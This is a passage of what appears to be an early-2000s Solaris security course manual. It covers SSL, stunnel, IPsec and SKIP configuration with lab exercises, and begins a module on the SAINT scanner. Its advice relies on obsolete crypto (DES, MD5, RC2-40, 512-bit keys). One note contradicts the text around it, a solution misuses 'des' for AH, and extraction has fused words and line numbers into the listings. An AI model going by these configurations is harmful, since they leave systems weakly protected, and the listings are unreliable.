● System administration:[http://darkwing.uoregon.edu/~hak/unix.html ]

● Menezes, Alfred J., Paul C. van Oorschot, and Scott A. Vanstone.Handbook of Applied Cryptography. CRC Press, 1996.

● Veeraraghavan, Sriranga and Paul Watters. Solaris 8: The CompleteReference. Osborne McGraw Hill, 1999.

● Winsor, Janice. Solaris 8 System Administrator's Reference Guide,Prentice-Hall PTR, 2000.

● Sun Security Enhancements Online:[http://www.sun.com ]

● Online manual pages for ipsecconf(1M) , ipseckey(1M) , andipsec(7P)

Implementing Secure Communication Using SSL



While security measures that protect physical devices attached to, orforming part of, host machines are essential, it is also important forcommunications between machines to be secure. SSL provides securecommunications between machines. SSL is a non-proprietary protocol andis widely used.

The most common implementation of SSL (but not the only one) issupported and maintained by the Open SSL group, online athttp://www.openssl.org .



The Open SSL Project

The OpenSSL Project is an open development project designed to producea commercial-grade open-source toolkit implementation for SSL and theTransport Layer Security (TLS) protocols. SSL incorporates a generalpurpose cryptography library (for the full-strength version you must useone of the non-U.S. Web sites for the source code download). OpenSSL isbased on the SSLeay library developed by Eric A. Young andTim J. Hudson.

Caution – Some countries still prohibit the use of strong encryption.Before implementing the full-strength versions of SSL, ensure that the useof this type of encryption does not break the national law of the country inwhich the machine resides.

Defining the SSL


Defining the SSL

The SSL protocol’s goal is to provide privacy and reliability between twocommunicating applications. The applications can be operating systemcomponents, such as a client “talking” to a server, or two (or more) peermachines swapping data. A specific advantage of SSL is that it isapplication protocol independent. In other words, SSL works with both highlevel and low level protocols.

SSL is always composed of two layers. The lower layer consists of areliable transport protocol. This is most commonly TCP/IP and itswrappers. This is known as the SSL Record Protocol. The SSL RecordProtocol encapsulates the various higher level protocols. A typical exampleis the SSL Handshake Protocol, which allows a server and client tomutually authenticate and negotiate an encryption algorithm andassociated cryptographic keys. A second, higher–level protocol is usedtransparently on top of the SSL Record Protocol.

Often, a specific daemon encapsulates the SSL layers. Applications cancontinue to use open and non-secure ports, but those ports are actuallyfully encrypted by the SSL daemon. This is sometimes known astransparent encryption because the encryption is hidden from theapplication, but is still there.

Defining the SSL


Properties of SSL

The SSL protocol provides connection security with three basic properties:

● The connection is private between the two machines.

● The peer's identity can be authenticated using asymmetriccryptography. Asymmetric cryptography provides for mutualauthentication using keys from a certificate authority (CA),sometimes known as a trusted third party. This process is essentiallythe digital signature provision.

● The connection is reliable.

SSL uses an asymmetric (public key) cipher to define a secret session key.Symmetric cryptography (for example Data Encryption Standard (DES) orRC4) is used for actual data encryption, because symmetric encryption isfaster than asymmetric encryption.

The message transport includes a message integrity check. Because securehash functions, for example, Secure Hash Algorithm (SHA-1) or MessageDigest 5 (MD5) are used for the integrity check computations, there is abuilt-in defense against someone tampering with the packets.

Defining the SSL


Simplifying SSL Using the stunnel Program

A convenient method of providing SSL between clients is to use the opensource program stunnel . The stunnel program is an SSL wrapperdaemon which, when running between machines, provides an encryptedportal.

For example, host A has an application that does not use SSL but usessimple sockets instead (at port 1234). Host B has the same application (onport 1235). Configure the stunnel program on both machines andprovide the appropriate sockets. Host A’s application still connects to port1234, but the socket is redirected through the secure stunnel program.Host B’s application still connects to port 1235, but its socket is alsoredirected through the secure stunnel program. Hosts A and B are nowusing SSL, even if their applications are unsuitable for SSL configuration.

The stunnel daemon is widely used in configuring Virtual PrivateNetworks (VPNs) and for communications between clients and remoteLightweight Directory Access Protocol (LDAP) servers.

Defining the SSL


The stunnel program is not a complete SSL product. You still need anSSL library, such as OpenSSL, to provide the handshaking and encryption.Information on the stunnel program can be obtained from:http://www.stunnel.org/ .

Defining the SSL


How Secure Is the SSL?

The SSL is probably sufficiently secure for most practical purposes.However, even in its most secure form, the SSL is not totally secure.

The SSL works by encrypting information transmitted between machines.It uses public-private key encryption to authenticate hosts and to swapsession keys. The session key then encrypts the data between the hosts.There are problems with this encryption method.

The first problem is the session key length. Many governments areuncomfortable with the thought of private citizens sending informationwhich cannot be decrypted, even by governmental organizations. The keylengths of encryption ciphers are restricted in many countries. The cipheris easier to break with a shorter key length.

Defining the SSL


The second problem is a group of hackers known as the Key CrackingRing. This group has given notice that they plan to publish methods forcompromising the security of SSL for all systems. Currently, some lowsecurity versions of SSL have been compromised. Versions of SSL usingstrong (128-bit) encryption are still believed to be unbroken and secureand they are likely to remain so until a new method for factorizing keys isdeveloped.

Understanding the IP Security Architecture (IPsec)



For the Solaris OE, and most other operating systems, the implementationof network encryption is provided by IP security architecture (IPsec). IPsecprovides both encryption and validation of data. IPsec is a set ofstandards developed by the Internet Engineering Task Force (IETF). IPsecis an open source product available for most major versions of UNIX(including Linux) and Microsoft Windows.

Processing is performed within the IP processing layer (like the stunnelprogram), but the processing operates at a lower level. When in place andconfigured, IPsec encrypts all IP traffic irrespective of the applicationusing the stunnel program without the knowledge of the application.IPsec also provides host-to-host authentication. IPsec implements andcontrols security in a transparent manner. Because IPsec works at the levelof the IP transport, it can be applied at both the system level and at thelevel of the individual socket. You configure IPsec for the system with asuite of command line utilities. The socket layer implementation requiresprogramming expertise and is not covered here.

Note – Ensure that the IPsec protocol controls the authentication of IPaddresses and the encryption of data. The two should not be separated.



Configuring IPsec Security Associations

IPsec’s secure communication is managed by security associations (SAs),also known as key management. Two machines require at least twosecurity associations to communicate—one for the inbound and one forthe outbound traffic. IPsec does not currently support automatic securityassociation management.

IPsec provides two types of IP packet protection: an authentication header(AH), that provides the authentication component, and the encapsulatingsecurity payload (ESP) that provides encryption. You can use both ESP andAH in the same datagram.

Datagrams originating from within the system, or that have the system astheir target, are affected by the IPsec settings. Datagrams which areforwarded are not affected by the IPsec settings, because they do notbelong to the system.



Adding IPsec Keys

Use the ipseckey utility to configure the authentication and encryptionkeys. The ipseckey utility accepts single-line commands from thecommand line or, if no command line parameters are specified, enters aninteractive session. Useful ipseckey commands are:

add – Adds a new key definition

flush – Removes all existing definitions

dump – Outputs stored key definitions

The ipseckey command allows commands to be stored in files using thefollowing command line options:

-f filename – Reads commands from file

-s filename – Saves commands to file (use the file name to list thekey commands to standard output)



To improve security, the add command cannot be used on the commandline and it must be read from a file. Code 11-1 is an example key file thatsets ESP encryption between two hosts.

Code 11-1 Example Encryption Key Management File

1 # Example SA key management file - encryption23 add esp spi 0x2112 src <this host> dst <other host> \4 encralg des encrkey be02938e7def283956 add esp spi 0x5150 src <other host> dst <this host> \7 encralg des encrkey 8bd4a52e10127deb

Note – Each IPsec key command must be on a single line, which explainsthe use of the line continuation backslash (\) character.

The source and destination addresses must either be named hosts in the/etc/hosts file or IP addresses. This pair of security associations usesDES to encrypt the data.

The spi parameter specifies the security association security parametersindex. The spi parameter is a 32-bit integer that is sent to the receivinghost. You can use any unique random 32-bit number as long as thenumber is the same as the spi on the receiving host.

Configuring AH authentication requires a similar set of key definitions foreach pair of communicating hosts. Code 11-2 shows the “ExampleAuthentication Key Management File”

Code 11-2 Example Authentication Key Management File

1 # Example SA key management file - authentication23 add ah spi 0x2112 src <this host> dst <other host> \4 authalg md5 authkey bde359723576fdea08e56cbe876e24ad56 add ah spi 0x5150 src <other host> dst <this host> \7 authalg md5 authkey 930987dbe09743ade09d92b4097d9e93



There is no standard method of configuring the IPsec key definitions filesbut it is common practice to store the keys in a file called/etc/inet/ipseckeys and load the keys as part of the system bootprocess, as shown in Code 11-3.

Code 11-3 Example ipseckeys File

# more /etc/inet/ipseckeysadd esp spi 0x2112 src wallace dst grommit \

encralg des encrkey be02938e7def2839add esp spi 0x5150 src grommit dst wallace \

encralg des encrkey 8bd4a52e10127debadd ah spi 0x2113 src wallace dst grommit \

authalg md5 authkey bde359723576fdea08e56cbe876e24ad \add ah spi 0x5151 src grommit dst wallace \

authalg md5 authkey 930987dbe09743ade09d92b4097d9e93 \

Then create a boot script in the /etc/rc3.d/s99ipsec_startupdirectory and add the following lines, as shown in Code 11-4.

Code 11-4 Example ipsec_startup Script

1 case $1 in2 start)1 if [ -f /etc/inet/ipseckeys ]2 then3 /usr/sbin/ipseckey -f /etc/inet/ipseckeys4 fi5 ;;6 stop)7 /usr/sbin/ipseckey flush8 ;;9 esac



Configuring IPsec Policies

Regular host configurations are held in the/etc/inet/ipsecpolicy.conf file. You can add entries to this file withthe ipsecconf configuration utility.

Changes made with the command line tools are not preserved after ashutdown. This means that a machine defaults to insecurecommunications after a reboot. To avoid this problem, add IPsecconfigurations for required communications to the/etc/inet/ipsecinit.conf file, which is read during the boot process.If this file exists, the inet initialization script applies the IPsec securitypolicies during the startup process.

Note – IPsec is enabled if the /etc/inet/ipsecinit.conf file does notexist at system boot time.



Using the ipsecconf utility to Configure IPsec

The ipsecconf utility is a command line utility that sets the policy andrules that apply to system-level IP traffic. Table 11-1 describes theipsecconf options.

Table 11-1 The IPsec Configuration File

Flag Option

None Queries the current configuration status. Entriesare shown with an index number.

-a file Adds one or more new policies listed in file tothe system.

-d index Deletes the policy identified by the index numberfrom the system.

-f Flushes policies.

-l Provides a listing of the policy entries.



IPsec configurations are stored in the /etc/inet/ipsecpolicy.conf file.The ipsecconf utility maintains this file with precedence rules. Do notedit this file manually or you might alter the precedence of policies andcompromise the security of your system.

-n Displays the network addresses and theirassociated ports. You must use the -n optionwith the -l option.

-q Prevents the display of the warning and bannermessages (quiet mode).

Table 11-1 The IPsec Configuration File (Continued)

Flag Option



Syntax for the IPsec Configuration File

The IPsec configuration file syntax is:

{patterns} action { properties}

where:

pattern is a name value pair as shown in Table 11-2 on page 11-21

action a policy action, as shown in Table 11-3 on page 11-21

properties a policy property, as shown in Table 11-4 on page 11-22



Table 11-2 Definitions for IPsec Policy Patterns

Pattern Definition

saddr The source address for the datagrambeing configured. A daddr entry isrequired to complete the pair.

daddr The destination address of the pair.

smask Provides a source mask to allowsubnet addresses to be specified. Useeither hexadecimal (0xffff0000) orinternet dot (255.255.0.0) notation.

dmask Provides a destination mask using thesame notations as smask.

dport Specifies the destination port to becontrolled (for example telnet ). Afterthe port is specified, a rule can beapplied.

Table 11-3 Definitions for IPsec Policy Actions

Action Definition

apply Applies IPsec to the datagram (validoutbound only)

permit Permits the datagram if it matches theconstraints (inbound only)

bypass Bypasses any policy checks if thedatagram matches the pattern



Table 11-4 Definitions for IPsec Policy Properties

Property Definition

auth_algsencr_auth_algs

The authentication algorithm. Itshould be MD5 or HMAC-MD5, SHA1,or HMAC-SHA1. Use ANY if there isno preference for the authentication.

encr_algs Specifies the encryption algorithm touse. Must be one of two possibilities:DES, DES-CBC (for single pass DES),or 3DES, 3DES-CBC (triple DESencryption). Use NULL for noencryption.



Rules for Parsing the Configuration File

When the file is loaded, each statement writes a separate policy to thesystem. Policies are applied in the order in which they are found in the filewith the following exceptions:

● Bypass action always has the highest precedence.

● An ESP policy is stronger than an AH policy. When a policy definesa stronger level of protection further in the file, the stronger policyhas higher precedence. The strongest rules contain ESP and AHcomponents.

To specify a policy with ESP and AH components, define both auth_algs(AH) and encr_algs (ESP) or encr_auth_algs (ESP) in the same policy.



Example IPsec Configurations

The hostB example in Code 11-5 specifies that any packet from hostA tohostB should be encrypted with 3DES and authenticated with SHA1.

Code 11-5 Example IPsec Configuration to Encrypt andAuthenticate

1 #2 # Encrypt data from hostA to hostB3 #4 {5 saddr hostA6 daddr hostB7 }8 permit9 {10 encr_algs 3DES11 encr_auth_algs SHA112 }



Code 11-6 specifies that any traffic originating from the 134.56.0.0 networkbe authenticated.

Code 11-6 Example IPsec Configuration to Authenticate AllData From Network 134.56.0.0

1 #2 # Authenticate 134.56.x.x3 # Allow any authentication scheme4 #5 {6 daddr 134.56.0.0 # Network address7 dmask 0xffff00008 }9 permit10 {11 auth_algs any12 }

Code 11-7 specifies all traffic sent to hostB from hostA be encrypted usingthe DES encryption.

Code 11-7 Example IPsec Configuration to Encrypt Data

1 #2 # Protect the outbound TCP traffic between machines3 # using ESP and use DES algorithm.4 #5 {6 saddr hostA7 daddr hostB8 ulp tcp # only TCP datagrams.9 } apply {10 encr_algs DES # Use DES to encrypt11 SA shared # Use shared SA12 }



Security Considerations With IPsec

The security of IPsec can be compromised if intruders have access to theconfiguration file. Follow these guidelines to use IPsec securely:

● Do not transport the file in plain text over the network.

● Do not mount the file on an NFS file system.

● Ensure that the policies are in force before starting anycommunication.

● Do not change policies in the middle of a communication.

● Names are not trustworthy if your naming system is compromisedand the host source address is known. Use the IP address instead.

● Use AH and ESP together to provide the highest level of security.

● If any host using IPsec is compromised, all IPsec configurations mustbe regenerated.

● Impractical for large numbers of hosts: 10 hosts require 110 keys forESP alone.

Using the SunScreen™ SKIP Utility



Another utility available from the Solaris OE besides IPsec that you canuse effectively for network protocols is SKIP. SKIP is bundled withSunScreen™ Secure Net 3.0 and SunScreen™ Lite; it can also be obtainedas a separate standalone product.

The SKIP utility builds an encrypted channel between two hosts, andauthenticates every network packet using an authentication algorithm. Itis especially useful between local hosts that are not located behind afirewall. Administrators like using SunScreen SKIP because it is easy toadd and remove systems, and turn encryption and authentication off andon without major network alterations.

SKIP runs a kernel process on each host that can be visualized as residingbetween the network interface of the host system and the IP softwarelayer. SKIP intercepts data packets and performs encryption andauthentication in the transmission and reception processes, making thepacket unreadable to someone monitoring the devices.



Configuring the SKIP Utility

Install the SKIP cluster on each workstation that will use it. This clusterconsists of the following packages:

● SUNWbdc– SKIP Bulk Data Crypt 1.5 Software

● SUNWbdcx– SKIP Bulk Data Crypt (64-bit) 1.5 Software

● SUNWrc2– SKIP RC2 Crypto Module 1.5 Software

● SUNWrc4– SKIP RC4 Crypto Module 1.5 Software

● SUNWrc4x– SKIP RC4 Crypto Module (64-bit) 1.5 Software

● SUNWes– SKIP End System 1.5-FCS Software

● SUNWesx– SKIP End System 1.5-FCS (64-bit) Software

● SUNWkeymg– SKIP Key Manager Tools 1.5 Software

● SUNWkisup – SKIP I-Support Module 1.5 Software

● SUNWsman– SKIP I-Man page Module 1.5 Software

Before the network interface device can be modified for SKIP, you mustgenerate a unique key pair; two independent codes for every host that willrun SKIP on the network. This is done using the skiplocal commandwith the keygen argument. This command prompts you to enter 50 ormore random characters as input to the program to ensure that thealgorithm generates a unique key pair.

Prior to using the SKIP Local ID database, you must initialize it under the/etc/skip directory using:

# skiplocal -i

Code 11-8 shows an example SKIP key generation.

Code 11-8 Example SKIP Key Generation

# skiplocal -kgenerating local secret with 512 modulus sizeIt would help the quality of the random numbers if you wouldtype 50-100 random keys on the keyboard. Hit return whenyou are done. < 50 or more random keystrokes are entered here>52 <Format: Hashed Public Key (MD5)Name/Hash: 5b 50 28 e7 7c ea 9b 13 06 dd 01 d3 59 89 7f 0d



Not valid Before: Mon Jun 22 18:00:00 1998Not valid After: Sun Jun 22 18:00:00 2003g: 2p:f52aff3ce1b1294018118d7c84a70a72d686c40319c807297aca950cd9969fabd00a509b02463083d66a45d419f9c7cbd894b221926baaba25ec355e92a055fpublic key:795195d7b0e80a357945f1d1c9c60bae8fb50ec64b84cb26554a81f149e7bbd672bd272a5e6f4a1d9591f704f1b022ce873e790da5135c7cd02ed4c93a7322bAdded local identity slot 0

This example creates a unique key pair for this host. Repeat this processon every host that will be running SKIP.

To list the existing key pairs, use the skiplocal command with the listargument. The following text indicates that a single key pair wasgenerated. There would be an additional listing if there were more thanone device with a SKIP key pair.

# skiplocal -lLocal ID Slot Name: 0 Type: Software Slot NSID: 8 MKID (name): 5b5028e77cea9b1306dd01d359897f0d Not Valid Before: Mon Jun 22 18:00:00 1998 Not Valid After: Sun Jun 22 18:00:00 2003 Modulus size: 512 bits

When you have a key pair defined and can list it using the skiplocallist command, you must update the system with the skipif -acommand and boot the system. This must be done on all systems runningSKIP.

# skipif -a# init 6

Before rebooting, you should save the current ACL, otherwise its setting isnot preserved across the reboots. Use the skipif command with the -sflag to save the SKIP status.

# skipif -s



Working With SKIP

After the system has been rebooted, you build the encrypted channel. Thisrequires the exchange of keys between the two hosts so that the channel isbuilt between them. The skiplocal export command outputs the keyin a format that is perfect for either cutting and pasting to the commandline, or for sending to another user using email. One of the easiest ways todo this on a single terminal is to log in remotely from one host to another,and cut and paste the key from one window to another. Code 11-9 shownhow to list a ship key.

Code 11-9 Listing a SKIP Key

# skiplocal -xskiphost -a grommit -R 0x9864c2c14ed58510173da60b52739b59 -r 8 -s 8 -kdes-cbc -t rc2-40 -m md5

The output from the skiplocal -x command can be cut and pasted intoa shell window on the remote host, as shown in Code 11-10.

Code 11-10 Setting a SKIP Key (From Another Host)

# skiphost -a grommit -R 0x9864c2c14ed58510173da60b52739b59 -r 8 -s 8 -kdes-cbc -t rc2-40 -m md5Adding metz: SKIP params: IP mode: tunneling Tunnel address: grommit Kij alg: DES-CBC Crypt alg: RC2-40 MAC alg: MD5 Receiver NSID: MD5 (DH Pub.Value) Receiver key id: 0x9864c2c14ed58510173da60b52739b59 Sender NSID: MD5 (DH Pub.Value)...done.

When the keys have been exchanged, both hosts must enable SKIP tocommunicate. To enable SKIP for encrypted transmission, use theskiphost command with a -o option, followed by the on flag, as shownin Code 11-11 on page 11-31.



Code 11-11 Enabling SKIP for Encrypted Transmissions

# skiphost -o onhme0: access control enabled, only authorized SKIP hosts can connectgrommit: SKIP params: IP mode: tunneling Tunnel address: grommit Kij alg: DES-CBC Crypt alg: RC2-40 MAC alg: MD5 Receiver NSID: MD5 (DH Pub.Value) Receiver key id: 0x8a4d51e02683c8952c1c5693d9b32596 Sender NSID: MD5 (DH Pub.Value) Sender key id: 0x9864c2c14ed58510173da60b52739b59

To disable SKIP use:

# skiphost -o off

Using Clear Text

You might not want to always use encrypted communications with everysystem; for example, DNS and mail servers. The clear text entry enablesall hosts to communicate with clear text unless otherwise specified.

# skiphost -a default

Exercise: Configuring and Using IPsec




● Configure IPsec for TCP communications between two hosts

● Restrict access to authenticated hosts

Preparation

You must install the Solaris OE security enhancements for cryptographybefore using IPsec. This is described in the first task of these exercises.

Tasks

For the purposes of this exercise you will work in pairs to configureencryption between your workstation and your partner’s workstation.Next, you will configure IPsec to authenticate connections from yourpartner’s workstation.

Ensure that you know the IP address of your workstation and yourpartner’s workstation. For convenience, the tasks refer to hosts A and B:make sure that you agree as to whose workstation is hostA and whose ishostB before you start the tasks.

You are not required to finish all of the tasks in the time allocated.Complete the final task and flush the IPsec configurations and keys fromthe system or reboot the system. Your instructor will give you time to dothis.

Caution – Remove the IPsec configuration as described in the last taskwhen you have finished. If you do not disable IPsec it will prevent youfrom completing the other tasks in this course.



Task – Configuring IPsec

Before using IPsec, you must install some of the Sun Securityenhancements packages. These can be downloaded from the Sun Web siteshown in “Additional Resources” on page 11-3. For your convenience, acopy of the security enhancements has been placed in the/usr/local/pkg/Sol8_encryption_sparc.tar directory.

To configure IPsec, install the Sun Cryptography packages and create anempty IPsec configuration file in the /etc/inet directory:

1. Extract the contents of this archive to the temporary directory andthen install the following packages from the /tmp/sparc/Packagessubdirectory:

● SUNWcry

● SUNWcry64

● SUNWcryr

● SUNWcryrx

2. Create an empty file called /etc/inet/ipsecinit.conf whichenables the IPsec configuration:

# touch /etc/inet/ipsecinit.conf

3. Reboot the system to enable IPsec:

# init 6

Task – Configuring IPsec Encryption

In this task, you configure IPsec encryption on two workstations and useit to communicate using the telnet command. Working with a colleague,you share encryption keys and work together to implement the steps inthe correct order on the two systems. If you have any confusion, discussthis with your instructor:

1. Run ipsecconf with no command line options. You should see nooutput. If you see an error message you have not enabled IPsec asdescribed in “Task – Configuring IPsec”. If you see any output, typethe following commands to remove any IPsec configurations on yoursystem.

# ipseckey flush# ipsecconf -f



2. With your partner, agree on 2 spi numbers: one for each direction ofcommunication between your two workstations. Your spi numbersmust not have already been used in your IPsec key configurationand must be different from each other. Write your numbers downhere:spi1 hostA to hostB : _______________________spi2 hostB to hostA : _______________________

3. Choose two, 16–digit numbers to use as keys for the DES encryption.Any value can be used. Write the encryption keys down here:DES key1 hostA : _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _DES key2 hostB : _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

4. Edit a new file called /etc/inet/esp.keys and add the followinglines. Both workstations use identical key files:

add esp spi spi1 src hostA dst hostB \encralg des encrkey key1

add esp spi spi2 src hostB dst hostA \encralg des encrkey key2

5. Add the IPsec keys on your machine with:

# ipseckey -f /etc/inet/esp.keys

6. Create a new configuration file called /etc/inet/esp.confcontaining the following lines. Each workstation needs a differentconfiguration file. Replace the values hostA and hostB with theappropriate IP addresses of your workstations.

{saddr thisHost daddr otherHost ulp tcp} apply {encr_algs DES sa shared}{saddr otherHost daddr thisHost ulp tcp} permit {encr_algs DES}

7. Add these configuration rules with:

# ipsecconf -a /etc/inet/esp.conf

8. Start the snoop utility in a separate window to monitor trafficbetween your two hosts, and use the -v option so that you can seethe snoop utility detect the encrypted datagrams:

# snoop -v hostA and hostB

9. Use the telnet command to verify that you can still communicatebetween your hosts with the IPsec policy installed and that the datapackets are now encrypted.



10. Verify that you can use the telnet command to log in to anotherworkstation (such as the instructor’s) and that this communication isunencrypted.

Task – Configuring IPsec Authentication

In this task, you configure IPsec authentication on your system and use itto communicate with a colleague using the telnet command:

1. With your partner, agree on 2 spi numbers: one for each direction ofcommunication between your two workstations. Your spi numbersmust not have already been used in your IPsec key configurationand must be different from each other. Write your numbers downhere:spi3 hostA to hostB : _______________________spi4 hostB to hostA : _______________________

2. Choose two, 32–digit numbers to use as keys for the MD5authentication. Any value can be used. Write the authentication keysdown here:

MD5 key3 hostA: _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _MD5 key4 hostB: _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

3. Edit a new file called /etc/inet/ah.keys and add the followinglines. Both workstations use identical key files:

add ah spi spi3 src hostA dst hostB \authalg md5 authkey key3

add ah spi spi4 src hostB dst hostA \authalg md5 authkey key4

4. Add the IPsec keys on your machine with:

# ipseckey -f /etc/inet/ah.keys

5. Create a new configuration file called /etc/inet/ah.confcontaining the following lines. Each workstation needs a differentconfiguration file. Replace the values thisHost and otherHost withthe appropriate IP addresses of your workstations.

{saddr thisHost daddr otherHost } apply {auth_algs any sa shared}{saddr otherHost daddr thisHost } permit {auth_algs any}

6. Add these configuration rules with:



# ipsecconf -a /etc/inet/ah.conf7. If the snoop utility is not running from the previous task, start the

snoop utility in a separate window to monitor traffic between yourtwo hosts, and use the -v option so that you can see the snoop utilitydetect the encrypted datagrams:

# snoop -v net hostA and net hostB

8. Use the telnet command to verify that you can still communicatebetween your hosts with the IPsec authentication policy installed.You should see that the packets are authenticated in the snoopoutput window.

9. Verify that you can use the telnet command to log in to anotherworkstation (such as the instructor’s) and that this communication isunauthenticated.

Task – Authenticating All Hosts With IPsec

Configure IPsec to allow only specific hosts to communicate with yourworkstation:

1. Examine the IPsec authentication configuration you have set up.How would you change the authentication rules to only allowauthenticated hosts to communicate with your host (for example, barall non-authenticated hosts).

2. Create a new configuration file and test your ideas. You must removethe existing configuration with:

# ipsecconf -f

Task – Using IPsec AH and ESP With All Hosts

If you completed the previous task, consider how you would extend yoursolution to encrypt as well as authorize all host communication. You mustremove the existing configuration with:

# ipsecconf -f



Task – Removing IPsec

Remove the IPsec configuration so that it does not interfere with theexercises in future modules of this course, as follows:

1. When you have finished these tasks, make sure that you remove allIPsec keys and configuration rules using:

# ipseckey flush# ipsecconf -f

2. Optionally, you can remove the IPsec initialization file and rebootyour workstation:

# rm /etc/inet/ipsecinit.conf# init 6

Exercise Summary


Exercise Summary

?!


● Experiences

● Interpretations

● Conclusions

● Applications

Exercise Solutions


Exercise Solutions

The following are the solutions for the tasks defined in the precedingsection.

Because most of the task steps are actually instructions, solutions are onlygiven below where an explicit question has been asked. If you havequestions about any of the other steps, consult the instructor.

Configuring IPsec

Before using IPsec you must install some of the Sun Securityenhancements packages. These can be downloaded from the Sun Web siteshown in “Additional Resources” on page 11-3. For your convenience acopy of the security enhancements have been placed in the/usr/local/pkg/Sol8_encryption_sparc.tar directory.

1. Extract the contents of this archive to the temporary directory andthen install the following packages from the /tmp/sparc/Packagessubdirectory:

● SUNWcry

● SUNWcry64

● SUNWcryr

● SUNWcryrx

# cd /tmp# tar xvf /usr/local/pkg/Sol8_encryption_sparc.tar# cd sparc/Packages# pkgadd -d SUNWcry# pkgadd -d SUNWcry64# pkgadd -d SUNWcryr# pkgadd -d SUNWcryrx

2. Create an empty file called /etc/inet/ipsecinit.conf whichenables the IPsec configuration.

# touch /etc/inet/ipsecinit.conf

3. Reboot the system to enable IPsec:

# init 6

Exercise Solutions


Configuring IPsec Encryption

1. Your configuration files should look something like the following(assuming the host IP addresses are 192.168.0.1 and 192.168.0.2).

# cat /etc/inet/esp.keysadd esp spi 20 src 192.168.0.1 dst 192.168.0.2 \

encralg des encrkey 1234567890123456

add esp spi 21 src 192.168.0.2 dst 192.168.0.1 \encralg des encrkey 6543210987654321

## cat /etc/inet/esp.conf{saddr 192.168.0.1 daddr 192.168.0.2} apply {encr_algs any sa shared}{saddr 192.168.0.2 daddr 192.168.0.1} permit {encr_algs any}

Configuring IPsec Authentication

Your configuration files should look something like the following(assuming the host IP addresses are 192.168.0.1 and 192.168.0.2).

# cat /etc/inet/ah.keysadd ah spi 22 src 192.168.0.1 dst 192.168.0.2 \

authalg des authkey 12345678901234567892123456789312

add ah spi 23 src 192.168.0.2 dst 192.168.0.1 \authalg des authkey 21398765432129876543210987654321

## cat /etc/inet/ah.conf{saddr 192.168.0.1 daddr 192.168.0.2} apply {auth_algs any sa shared}{saddr 192.168.0.2 daddr 192.168.0.1} permit {auth_algs any}

Authenticating All Hosts With IPsec

1. Examine the IPsec authentication configuration you have set up.How would you change the authentication rules to only allowauthenticated hosts to communicate with your host (for example, barall non-authenticated hosts).

2. Create a new configuration file and test your ideas.

Exercise Solutions


3. Edit the AH configuration rules to remove the references to the otherworkstation; remove the daddr option from the apply lne and thesaddr option from the permit line. All incoming and outgoingcommunication will be authenticated. No access to unauthenticatedhosts is allowed. You can test this by trying to use the telnetcommand to log in to another workstation such as the instructor’smachine. The Telnet session will not connect and will eventuallytime-out.

Your IPsec configuration file will look like:

# cat /etc/inet/all.conf{saddr 192.168.0.1} apply {auth_algs any sa shared}{daddr 192.168.0.1} permit {auth_algs any}

Using IPsec AH and ESP With All Hosts

1. If you completed the previous task consider how you would extendyour solution to encrypt as well as authorize all host communication.

2. Add an encryption rule to your configuration file so that it lookssomething like:

# cat /etc/inet/all.conf{saddr 192.168.0.1} apply {auth_algs any encr_algs any sa shared}{daddr 192.168.0.1} permit {auth_algs any encr_algs any}

Removing IPsec

There are no solutions for this task.


Module 12

Analyzing Network Services

Objectives


● Apply Security Administrators Integrated Network Tool (SAINT) toimprove network security

● Install SAINT and launch probes using the SAINT graphical userinterface

● Configure SAINT using the configuration file

● Interpret SAINT reports

● Use the Courtney scanning tool to detect SAINT-type attacks

Relevance


Relevance

?!

Discussion – System administration of network services is a complextask. It is easy to inadvertently leave security holes when changingnetwork configurations. Network service probes such as SAINT canidentify security holes.

● Given that SAINT was originally a “hacker” tool, how safe is it to useit on a production network?

● Is it better to use a prewritten tool like SAINT or to write ananalytical suite of tools tailored to your own network?


Analyzing Network Services 12-3Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C



● Solaris OE manual pages.


● Comparison article of the capabilities of various scanners, NetworkComputing online at[http://www.networkcomputing.com/1201/1201f1b1.html ]

● SAINT online documentation, available at[http://www.wwdsi.com/saint/saint_documentation_2.html ]

Tool Downloads

● SAINT:[http://www.wwdsi.com/saint/ ]

● Courtney:[http://ciac.llnl.gov/ciac/ToolsUnixNetMon.html#Courtney ]

● openssl for Solaris OE required by tcpdump:[http://www.sunfreeware.com ]

● libpcap for Solaris OE required by tcpdump:[http://www.sunfreeware.com ]

● tcpdump for Solaris OE required by SAINT:[http://www.sunfreeware.com ]

Applying SAINT to Improve Network Security



Tools are available to probe system network services and to determinewhether these services are configured in a secure way. You can use varioustools to analyze different aspects of the network. The most complete tool iscalled the Security Administrator's Integrated Network Tool (SAINT).SAINT is the second generation version of the System Administrators Toolfor Analyzing Networks (SATAN) network probe and has been widely usedby intruders to detect weaknesses in network configurations. SAINT canbe a very effective tool for the administrator.

SAINT consists of a suite of Perl modules that provide an interface into aWeb browser. The tool has the low-level capabilities of Perl combined withan easy-to-use, thin client interface. In fact, SAINT is so easy to use that itcan be a real menace in the hands of external parties wanting to probe anetwork for weaknesses.



Caution – Virtually all Internet Service Providers (ISPs), and many publicnetworks, absolutely prohibit the use of any network probes or otheranalytical utilities without prior written permission. Punishment forinfringement are stringent (usually a permanent removal of accessprivileges). Before using SAINT, ensure that you have documentedpermission to analyze the targeted network.



Assessing the Capabilities of SAINT

SAINT operates by running standard Solaris OE utilities (called probes) incertain, predefined ways. The information SAINT obtains is then loggedto a datastore and displayed in the form of SAINT reports. All of thiscould be done manually, but SAINT’s advantage is that it is automaticand predefined. Because SAINT is a next generation tool, it offerssignificant advantages to SATAN’s user interface, but still shares theprimary aim, which is to detect potential security flaws (usuallyincorrectly set up or configured services). Because SAINT discoverssecurity flaws in the target systems, it can also find systems attached tothe target. These systems can also be probed and an entire networkanalyzed.

Certain security problems are well-known and documented. That meansthat these security problems can be specifically looked for in the targetsystem. These reports from SAINT are especially useful.



SAINT’s strength is that the information gathered can be reported inHTML format. In addition, a number of add-in tools can obtain additionalvalue from SAINT output. Some of these tools are freeware, while othersare commercial products. SAINT can then use these tools to report on thisdata or use a simple rule-based system to investigate any potentialsecurity problems.

While SAINT is primarily designed for analyzing the security implicationsof the results, you can also obtain lots of general network informationwhen using the tool including network topology, network services, andtypes of hardware and software being used on the network.

Comparing SAINT and SATAN

